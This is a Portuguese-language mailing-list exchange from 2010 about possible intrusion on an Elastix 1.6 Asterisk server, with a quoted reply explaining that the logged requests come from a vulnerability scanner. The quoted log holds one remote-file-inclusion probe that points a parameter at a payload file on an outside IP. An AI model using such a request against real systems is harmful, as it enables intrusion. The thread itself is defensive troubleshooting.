[AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6

Gleidison Sampaio gleidison.sampaio em hotmail.com
Segunda Novembro 22 16:48:56 BRST 2010



Alejandro,
Na verdade nao sou la aqueles especialistas, poderia me dizer onde verifico o log dos ramais, tipo o IP Publico que cada ramal se logou.


Att;
Gleidison C. Sampaio





> Date: Mon, 22 Nov 2010 15:39:10 -0300
> From: alejandrorflores em gmail.com
> To: asteriskbrasil em listas.asteriskbrasil.org
> Subject: Re: [AsteriskBrasil]	RES: Duvida ( SEGURANÇA ) Elastix 1.6
> 
> >> 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] "GET /user/soapCaller.bs
> >> HTTP/1.1" 302 305 "-" "Morfeus Fucking Scanner"
> >> 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] "GET
> >> /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1"
> >> 302 354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
> 
> Na verdade na verdade esses logs só mostram um robozinho de scanner de
> vulnerabilidades. Esses logs só mostram os caras procurando furo,
> porém, não tem. Encontrei entradas iguais nos logs dos meus servers,
> mas é só isso mesmo, algum manezão investigando tua máquina. Nesse
> caso, claro.
> Procure por aquivos estranhos no /tmp no /var/tmp, procure por
> processos estranhos no caso de uma invasão.
> No caso das ligações pra itália que você falou, eles ligaram
> autenticados ou anonimos?
> 
> -- 
> Abraço,
> Alejandro Flores
> http://www.triforsec.com.br/
> _______________________________________________
> KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. 
> - Hardware com alta disponibilidade de recursos e qualidade KHOMP
> - Suporte técnico local qualificado e gratuito 
> Conheça a linha completa de produtos KHOMP em www.khomp.com.br
> _______________________________________________
> Temos tudo para seu projeto VoIP com Asterisk!
> Descontos especiais para assinantes da AsteriskBrasil.org.
> Registre-se e receba um cupom exclusivo de desconto!
> Acesse agora www.voipmania.com.br
> ______________________________________________
> Lista de discussões AsteriskBrasil.org
> AsteriskBrasil em listas.asteriskbrasil.org
> http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil
> ______________________________________________
> Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscribe em listas.asteriskbrasil.org
 		 	   		  
-------------- Próxima Parte ----------
Um anexo em HTML foi limpo...
URL: http://listas.asteriskbrasil.org/pipermail/asteriskbrasil/attachments/20101122/2e1eac29/attachment.htm 


Mais detalhes sobre a lista de discussão AsteriskBrasil